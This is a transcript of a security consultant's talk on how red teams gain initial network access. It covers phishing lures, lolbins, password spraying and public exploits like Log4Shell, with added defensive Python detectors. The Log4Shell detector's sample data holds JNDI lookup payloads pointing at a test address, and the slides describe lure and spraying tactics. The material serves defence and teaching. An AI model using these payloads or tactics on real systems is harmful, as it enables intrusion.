Understanding Network Breaches: Methods and Mitigation
Discover how networks are breached through phishing, exposed services, and publicly available exploits as explained by a security consultant. Learn about phishing techniques, externally exposed services vulnerabilities, and common exploits used to gain unauthorized access. Explore ways to mitigate these risks and insights into threat actor tactics for breaching network security.
Presentation Transcript
How Networks Are Breached
Whoami
- Security Consultant at Rapid7, responsible for delivering penetration testing and Red Team services.
- Previously worked for State Farm and Rhino Security Labs.
- Currently spend time trying to build out our Red Team tooling, including ways to gain access to internal networks while remaining stealthy.
Purpose of Talk
- Talk about some of the ways I and colleagues gained access to companies' internal networks via Red Team engagements.
- Methods used:
  - Phishing
  - Externally exposed services
  - Publicly available exploits
- Briefly talk about some ways this can be mitigated.
- Briefly touch on how threat actors also abuse some of these methods.
- Not a threat hunter; this is from the lens of a Red Teamer.
Phishing
- Phishing comes in many shapes and sizes.
- Phishing / Spear Phishing: broad or targeted campaigns designed to coerce users into providing credentials and/or running malware on their computer.
- Vishing: voice phishing, trying to coerce someone on the phone into providing their credentials or running malware.
- Physical social engineering: physically trying to enter a target building.
Externally Exposed Services
- Citrix: spray credentials against a Citrix portal and potentially gain access to published applications that can be escaped, etc.
- VPNs: using credentials gained from spraying or another method, authenticate to the externally exposed VPN.
- Email services: while email services may not directly provide access to an internal network, if MFA is not enabled an attacker can use this access to send more convincing phishing campaigns.
Publicly Available Exploits
- Log4Shell
- EternalBlue
- BlueKeep
- Citrix NetScaler
How is Access Gained Through Phishing
- From a Red Team perspective, phishing is targeted at one organization and is tailored to trick employees of that organization.
- The goal in most cases is to get employees to provide credentials and run our initial access payload.
- Some threat actor phishing campaigns may be simple and generic, for example Emotet spam messages.
How is Access Gained Through Phishing
- In the context of emails, payloads may be included as attachments or offered for download via a malicious link.
- From a Red Team perspective, payloads will be hidden behind a cloned login page to give the illusion they are coming from a legitimate source.
- Techniques such as HTML smuggling may be used to get around proxies blocking certain file types.
What do Malicious Files Contain
- A very popular method for Red Teams and threat actors has been to package payloads into an ISO or ZIP file that contains a Windows Shortcut (LNK) file.
  - Bypasses MOTW (Mark of the Web) propagation.
  - May be more convincing.
  - Technique used by groups such as Emotet and Qakbot.
- To bypass application whitelisting, the Windows Shortcut file may be configured to execute a payload using a Windows lolbin (living off the land binary): Microsoft-signed binaries that can be used to execute code, e.g. RegSvcs.exe, InstallUtil.exe, rundll32.exe, regsvr32.exe.
Example: Emotet
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/
Example: Believed to be APT29
Source: https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/
Other File Types
Some other popular file types used to distribute malware for initial access are:
- HTA: HTML application containing VBScript or JScript that executes a payload on a user's computer.
- EXE: raw executable files may also be used.
- Office documents: Office documents containing VB macros or LNK files embedded within.
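The ISO/ZIP-plus-LNK lure and the lolbin list above describe a pattern that is easy to express as an endpoint detection. The following is an added example, not code from the presentation: it scores constructed process-creation events (field names loosely follow Sysmon process-creation telemetry, but the field names, paths and thresholds are assumptions) for a Microsoft-signed lolbin spawned by explorer.exe from a mounted ISO drive letter or an Explorer-extracted ZIP in Temp, which is what a double-clicked shortcut from such a lure looks like on the host.

```python
"""Heuristic detection for the lure described above: a Windows shortcut inside
an ISO/ZIP that launches a Microsoft-signed lolbin. Added example, not code
from the presentation. The events below are constructed and loosely follow
Sysmon process-creation fields; field names and thresholds are assumptions."""
import re
from dataclasses import dataclass

# Lolbins named on the slides, plus mshta.exe from the mitigations slide.
LOLBINS = {"regsvcs.exe", "installutil.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe"}

# Where a user-extracted ZIP lands (Explorer's Temp1_<name>.zip folder) or a download sits.
SUSPICIOUS_PATH = re.compile(r"(?i)(\\Temp\\|\\Downloads\\|Temp1_[^\\]*\.zip)")
# A drive letter other than C:, which is where a double-clicked ISO gets mounted.
NON_SYSTEM_DRIVE = re.compile(r"(?i)\b[D-Z]:\\")


@dataclass
class ProcessEvent:
    image: str              # full path of the new process
    parent_image: str       # full path of the parent process
    command_line: str
    current_directory: str


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, reasons). Each matched indicator adds one point;
    a lone lolbin launch scores 1, which is far too common to alert on."""
    reasons: list[str] = []
    if image_name(ev.image) not in LOLBINS:
        return 0, reasons
    reasons.append(f"lolbin {image_name(ev.image)}")
    if image_name(ev.parent_image) == "explorer.exe":
        reasons.append("spawned by explorer.exe (typical for a double-clicked LNK)")
    haystack = f"{ev.command_line} {ev.current_directory}"
    if SUSPICIOUS_PATH.search(haystack):
        reasons.append("Temp/Downloads path (extracted ZIP or download)")
    if NON_SYSTEM_DRIVE.search(haystack):
        reasons.append("non-system drive letter (possible mounted ISO)")
    return len(reasons), reasons


def find_alerts(events, threshold: int = 2):
    """Events whose score reaches the threshold, paired with their reasons."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append((ev, reasons))
    return alerts


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # 1: mshta run from a mounted ISO after a shortcut double-click
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                 r"mshta.exe E:\invoice.hta", "E:\\"),
    # 2: routine rundll32 use by a service host (benign)
    ProcessEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\svchost.exe",
                 r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
                 r"C:\Windows\System32"),
    # 3: regsvr32 loading a DLL from an Explorer-extracted ZIP in Temp
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\explorer.exe",
                 r"regsvr32.exe /s update.dll",
                 r"C:\Users\bob\AppData\Local\Temp\Temp1_docs.zip"),
    # 4: ordinary user program (benign)
    ProcessEvent(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe",
                 r"notepad.exe notes.txt", r"C:\Users\bob\Documents"),
]

if __name__ == "__main__":
    for ev, reasons in find_alerts(SAMPLE_EVENTS):
        print(image_name(ev.image), "->", "; ".join(reasons))
```

The scoring deliberately refuses to alert on a lolbin launch alone (event 2 is what rundll32 does all day); it is the combination of a lolbin, an Explorer parent and an unusual location that reproduces the lure. In production the same logic would sit in the EDR or SIEM query language rather than Python, and the drive-letter heuristic should be tuned for environments that map network shares to letters.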
How is Access Gained Through Vishing
- Call users and convince them to visit a webpage hosting your malicious payload.
- Disguise it as an urgent security patch.
- Spoof the tech support phone number if you can get ahold of it.
How is Access Gained Through Physical Social Engineering
- Tailgating someone to gain access to unauthorized spaces.
- Lockpicking to gain access to unauthorized spaces.
- Posing as a support person, etc.
- Once inside, plug a drop box into the network.
Some Mitigations
- Deploy Endpoint Detection and Response (EDR).
- Ensure mitigations such as application whitelisting are enabled and properly set up.
  - Consider adding common Windows lolbins such as mshta.exe to the block list if they are not utilized within your environment.
- Block the download of common malicious file types if possible (.HTA, .ISO).
- Set up email filters to block some malicious emails from coming in:
  - Don't allow uncategorized domains.
  - Don't allow typo-squatted domains.
  - Don't allow newly registered domains.
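The email-filter rules on this slide (uncategorized, typo-squatted and newly registered sender domains, plus blocked .HTA/.ISO attachments) can be written down as a small policy. The following is an added example, not the presentation's own code and not any mail gateway's API: the organization domains, the category and registration-date lookups, the 30-day cutoff and the sample messages are all constructed, and a real gateway would pull categories and domain ages from its vendor feeds instead of the dictionaries here.

```python
"""Sender-domain and attachment policy modelled on the filter rules above.
Added example, not the presentation's own code. Organization domains,
category/WHOIS lookups, cutoff and sample messages are constructed."""
from datetime import date

ORG_DOMAINS = {"example.com", "example-corp.com"}  # assumed organization domains
BLOCKED_ATTACHMENT_EXT = {".hta", ".iso"}          # file types named on the slide
NEW_DOMAIN_DAYS = 30                                # assumed "newly registered" cutoff
TODAY = date(2024, 6, 15)                           # constructed evaluation date

# Constructed stand-ins for a URL-categorization feed and WHOIS creation dates.
DOMAIN_CATEGORY = {"vendor-partner.net": "Business", "fresh-startup.io": "Technology"}
DOMAIN_REGISTERED = {
    "vendor-partner.net": date(2015, 3, 1),
    "fresh-startup.io": date(2024, 6, 1),
    "examp1e.com": date(2024, 5, 20),
}


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot look-alike domain labels."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_internal(domain: str) -> bool:
    """Our own domains and their subdomains are exempt from the external checks."""
    return domain in ORG_DOMAINS or any(domain.endswith("." + d) for d in ORG_DOMAINS)


def is_typosquat(domain: str, max_distance: int = 2) -> bool:
    """A registrable label within a few edits of ours, or containing ours, is suspect."""
    label = domain.split(".")[0]
    org_labels = {org.split(".")[0] for org in ORG_DOMAINS}
    if label in org_labels:
        return False
    return any(levenshtein(label, o) <= max_distance or o in label for o in org_labels)


def evaluate(msg: dict, today: date) -> list[str]:
    """Reasons to block the message; an empty list means deliver."""
    domain = msg["from"].rsplit("@", 1)[-1].lower()
    reasons = []
    if not is_internal(domain):
        if domain not in DOMAIN_CATEGORY:
            reasons.append("uncategorized domain")
        registered = DOMAIN_REGISTERED.get(domain)
        if registered is not None and (today - registered).days < NEW_DOMAIN_DAYS:
            reasons.append("newly registered domain")
        if is_typosquat(domain):
            reasons.append("typo-squatted domain")
    for name in msg.get("attachments", []):
        ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
        if ext in BLOCKED_ATTACHMENT_EXT:
            reasons.append(f"blocked attachment type {ext}")
    return reasons


# Constructed messages: a normal partner mail, a look-alike "IT support" domain,
# a legitimate but very new domain, and an internal mail carrying an ISO.
SAMPLE_MESSAGES = [
    {"from": "alice@vendor-partner.net", "attachments": ["invoice.pdf"]},
    {"from": "it-support@examp1e.com", "attachments": ["patch.html"]},
    {"from": "news@fresh-startup.io", "attachments": []},
    {"from": "hr@mail.example.com", "attachments": ["handbook.ISO"]},
]


def triage(messages, today=TODAY):
    """Sender and block reasons for each message."""
    return [(m["from"], evaluate(m, today)) for m in messages]


if __name__ == "__main__":
    for sender, reasons in triage(SAMPLE_MESSAGES):
        print(sender, "->", "deliver" if not reasons else "; ".join(reasons))
```

Note that the third message is blocked purely for domain age even though the domain is categorized and not a look-alike; that is the intended trade-off of the "no newly registered domains" rule, and the usual remedy is an allow-list exception process rather than loosening the rule.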
How is Access Gained Through External Applications
- Externally exposed applications can provide a ton of useful information to an attacker.
- Some applications utilize users' domain credentials and can allow for password spraying.
- Some applications also allow for user enumeration, which can help narrow down a list of actual usernames for phishing / password spraying.
How is Access Gained Through External Applications
- Some applications that are exposed without MFA or other protections may be utilized to gain access to an internal network.
- Citrix: when exposed to the internet and lacking something such as MFA, Citrix may be able to provide initial access. Used by groups like FIN5 and OilRig according to MITRE.
- VPN: with valid credentials it may be possible to authenticate to a VPN and gain access to the internal network. Used by groups such as APT29 and Dragonfly according to MITRE.
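Password spraying and user enumeration against an exposed Citrix or VPN portal, as described on the two slides above, both leave a recognizable shape in the gateway's authentication log: one source trying a handful of attempts against many distinct accounts, or one source collecting many "unknown user" responses. The following is an added example, not code from the presentation; the log line format, the reason codes and the sample lines are constructed, so the regex must be adapted to the real gateway's fields.

```python
"""Password-spray and user-enumeration detection over gateway authentication
logs. Added example, not from the presentation. The log format, reason codes
and sample lines are constructed; adapt LOG_RE to your gateway's real fields."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) auth-(?P<result>ok|fail) "
    r"user=(?P<user>\S+) src=(?P<src>\S+)(?: reason=(?P<reason>\S+))?$"
)


def parse_line(line: str):
    """One log line to a dict, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    event = m.groupdict()
    event["ts"] = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return event


def detect(lines, window=timedelta(minutes=10), spray_users=5, enum_unknown=5):
    """Map each source IP to the sorted list of patterns seen in any window.

    password-spray   : failures against >= spray_users distinct existing accounts
    spray-success    : a spray window that also contains a successful login
    user-enumeration : >= enum_unknown 'unknown-user' failures (probing usernames)
    """
    by_src = defaultdict(list)
    for event in filter(None, map(parse_line, lines)):
        by_src[event["src"]].append(event)

    findings = defaultdict(set)
    for src, events in by_src.items():
        events.sort(key=lambda e: e["ts"])
        for i, start in enumerate(events):  # a window anchored at each event
            sprayed, unknown, success = set(), 0, False
            for e in events[i:]:
                if e["ts"] - start["ts"] > window:
                    break
                if e["result"] == "ok":
                    success = True
                elif e["reason"] == "unknown-user":
                    unknown += 1
                else:  # failure against an account that exists
                    sprayed.add(e["user"])
            if len(sprayed) >= spray_users:
                findings[src].add("password-spray")
                if success:
                    findings[src].add("spray-success")
            if unknown >= enum_unknown:
                findings[src].add("user-enumeration")
    return {src: sorted(kinds) for src, kinds in findings.items()}


# Constructed log: a spray that lands on one account, a username probe, and a
# user who simply mistyped a password twice.
SAMPLE_LOG = """\
2024-06-10T09:00:01Z vpn-gw auth-fail user=alice src=198.51.100.7 reason=bad-password
2024-06-10T09:00:08Z vpn-gw auth-fail user=bob src=198.51.100.7 reason=bad-password
2024-06-10T09:00:15Z vpn-gw auth-fail user=carol src=198.51.100.7 reason=bad-password
2024-06-10T09:00:22Z vpn-gw auth-fail user=dave src=198.51.100.7 reason=bad-password
2024-06-10T09:00:29Z vpn-gw auth-fail user=erin src=198.51.100.7 reason=bad-password
2024-06-10T09:00:36Z vpn-gw auth-ok user=frank src=198.51.100.7
2024-06-10T09:05:00Z citrix-gw auth-fail user=zz01 src=203.0.113.9 reason=unknown-user
2024-06-10T09:05:02Z citrix-gw auth-fail user=zz02 src=203.0.113.9 reason=unknown-user
2024-06-10T09:05:04Z citrix-gw auth-fail user=zz03 src=203.0.113.9 reason=unknown-user
2024-06-10T09:05:06Z citrix-gw auth-fail user=zz04 src=203.0.113.9 reason=unknown-user
2024-06-10T09:05:08Z citrix-gw auth-fail user=zz05 src=203.0.113.9 reason=unknown-user
2024-06-10T09:05:10Z citrix-gw auth-fail user=zz06 src=203.0.113.9 reason=unknown-user
2024-06-10T10:00:00Z vpn-gw auth-fail user=alice src=192.0.2.4 reason=bad-password
2024-06-10T10:00:20Z vpn-gw auth-fail user=alice src=192.0.2.4 reason=bad-password
2024-06-10T10:00:45Z vpn-gw auth-ok user=alice src=192.0.2.4
""".splitlines()

if __name__ == "__main__":
    for src, kinds in detect(SAMPLE_LOG).items():
        print(src, "->", ", ".join(kinds))
```

Two design points worth copying into a real rule: spraying is counted per distinct account rather than per attempt, so the one-password-per-user pattern that stays under lockout thresholds still trips it, and a successful login inside a spray window is escalated separately because that is the event that turns a noisy probe into an initial-access incident. The enumeration rule only works if the gateway distinguishes unknown users from bad passwords in its logs; the mitigation slide's point about requiring MFA still applies, since a spray that lands on a valid password without MFA is exactly how the Citrix and VPN cases above play out.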
Possible Mitigations
- Applications that don't need to be exposed to the internet should not be.
- Applications that need to be exposed to the internet should require some form of MFA or secure authentication such as certificates.
How is External Access Gained via Publicly Available Exploits
- A highly exploitable and widely deployed application gets exposed for having a critical vulnerability that allows for remote code execution.
- These vulnerabilities may be abused to gain access to internal networks by exploiting the vulnerability to download and execute some malware.
Common Examples
- Log4j / Log4Shell: vulnerability in a very common Java logging library. Was abused to drop cryptominers, botnets, and Cobalt Strike beacons.
- EternalBlue / BlueKeep: publicly exposed SMB or RDP services were vulnerable to remote code execution. EternalBlue is most commonly known from the WannaCry ransomware attack.
- Citrix NetScaler: a remote code execution vulnerability existed in Citrix NetScaler.
Possible Mitigations
- Ensure the proper patch is applied when released.
- Monitor vulnerable devices for any IOCs related to that vulnerability.
- Pray the patch works.
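"Monitor vulnerable devices for IOCs" is concrete for the Log4Shell case named above: exploitation attempts arrive as a JNDI lookup string in whatever request field the application logs, so the web server's access log is the first place to look while a patch is being rolled out. The following is an added example, not code from the presentation: it scans constructed Apache/nginx-style access log lines (the addresses, timestamps and user agents are made up) for the lookup marker in the request line, Referer and User-Agent, decoding URL encoding first so that an encoded copy in a query string is not missed.

```python
"""Access-log sweep for the Log4Shell lookup marker, as an IOC monitor while
patching. Added example, not from the presentation. The log lines below are
constructed (RFC 5737 test addresses); the combined-log regex is an assumption
about the server's format and may need adjusting."""
import re
from urllib.parse import unquote

# The JNDI lookup prefix is the observable that every Log4Shell probe must carry.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Common/combined log format: src ident user [ts] "request" status bytes "referer" "ua"
ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
FIELDS = ("request", "referer", "ua")


def scan_line(line: str):
    """Return (src, ts, [(field, 'jndi-lookup'), ...]) or None when clean/unparsed."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    hits = []
    for field in FIELDS:
        # Decode twice: probes are sometimes double-encoded to slip past naive filters.
        value = unquote(unquote(m.group(field)))
        if JNDI_RE.search(value):
            hits.append((field, "jndi-lookup"))
    return (m.group("src"), m.group("ts"), hits) if hits else None


def scan_log(lines):
    """All lines carrying the marker, in log order."""
    return [hit for hit in map(scan_line, lines) if hit]


def sources(lines):
    """Distinct source addresses that sent the marker, for blocking or hunting."""
    return sorted({src for src, _, _ in scan_log(lines)})


# Constructed sample: one benign request, one probe in the User-Agent header,
# one URL-encoded probe in the query string.
SAMPLE_ACCESS_LOG = [
    '203.0.113.50 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Dec/2021:14:02:30 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23/a}"',
    '198.51.100.23 - - [10/Dec/2021:14:02:31 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.23%2Fa%7D HTTP/1.1" 400 0 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for src, ts, hits in scan_log(SAMPLE_ACCESS_LOG):
        print(ts, src, "->", ", ".join(f"{field}:{kind}" for field, kind in hits))
```

A hit in this sweep means an attempt was logged, not that it succeeded; the next step is to check whether the host was running a vulnerable Log4j build at that time and whether it made outbound LDAP or HTTP connections to the address in the lookup, which is where the "pray the patch works" line on the slide becomes a verification task rather than a hope.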
Conclusion
- There are many ways to perform initial access.
- Preventing everything can be tricky; however, threat hunting feeds can be extremely useful for understanding the current methods used by a variety of threat actors.
- Leverage resources like MITRE to learn different TTPs and mitigations you can possibly employ.